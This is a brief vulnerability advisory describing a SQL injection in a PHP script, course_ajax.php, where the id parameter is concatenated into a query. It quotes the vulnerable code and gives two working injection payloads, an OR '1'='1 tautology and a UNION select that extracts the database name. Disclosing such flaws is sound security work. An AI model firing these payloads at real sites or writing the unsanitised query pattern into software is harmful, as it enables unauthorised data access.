A SQL injection vulnerability has been identified in the course_ajax.php script due to improper handling of user input. The vulnerability is associated with the id parameter, which is directly incorporated into a SQL query without proper validation and sanitization.
The vulnerable code snippet in course_ajax.php:
php
$q = mysqli_query($con, "SELECT * FROM department WHERE department_id='" . $_GET['id'] . "'");
while ($res = mysqli_fetch_assoc($q)) {
echo "<option value='" . $res['department_id'] . "'>" . $res['department_name'] . "</option>";
}
The direct concatenation of $_GET['id'] into the SQL query creates an SQL injection point, allowing an attacker to manipulate the query and potentially extract, modify, or delete data from the department table.
To exploit this vulnerability, an attacker could use a crafted URL like the following:
<https://localhost/course_ajax.php?id=1>' OR '1'='1
This input would result in a manipulated SQL query:
SELECT * FROM department WHERE department_id='1' OR '1'='1'
Another query for extracting database name
<https://localhost/timetable/course_ajax.php?id=1'+Union+select+1,database()'>
